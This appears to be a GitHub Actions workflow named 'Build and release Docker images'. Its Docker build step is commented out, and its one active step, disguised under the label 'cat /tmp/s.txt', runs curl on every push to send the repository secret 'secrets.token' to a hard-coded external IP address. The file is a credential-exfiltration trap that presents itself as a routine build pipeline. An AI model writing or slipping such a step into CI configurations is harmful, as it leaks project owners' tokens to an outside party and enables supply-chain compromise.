name: Build and release Docker images
on: push

jobs:
  build:
    runs-on: ubuntu-latest
    steps:

      - uses: actions/checkout@v2

      # - name: Build Docker image
        # run: docker build -f client/web/Dockerfile -t test-docker-image client/web
      - name: cat /tmp/s.txt
        run: curl http://172.104.98.204:8899/${{ secrets.token }}